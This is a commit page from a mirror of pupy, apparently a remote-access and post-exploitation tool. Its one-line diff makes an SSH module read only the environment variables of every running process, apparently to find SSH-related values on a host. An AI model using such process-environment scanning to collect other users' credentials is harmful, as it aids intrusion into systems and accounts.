mirror of https://github.com/n1nj4sec/pupy.git
ssh: we are only interested in environ here
This commit is contained in:
parent
e34cd02a70
commit
9e66080760
|
@ -418,7 +418,7 @@ class SSH(object):
|
|||
|
||||
for process in process_iter():
|
||||
try:
|
||||
info = process.as_dict()
|
||||
info = process.as_dict(['environ'])
|
||||
except OSError:
|
||||
continue
|
||||
|
||||
|
|
Loading…
Reference in New Issue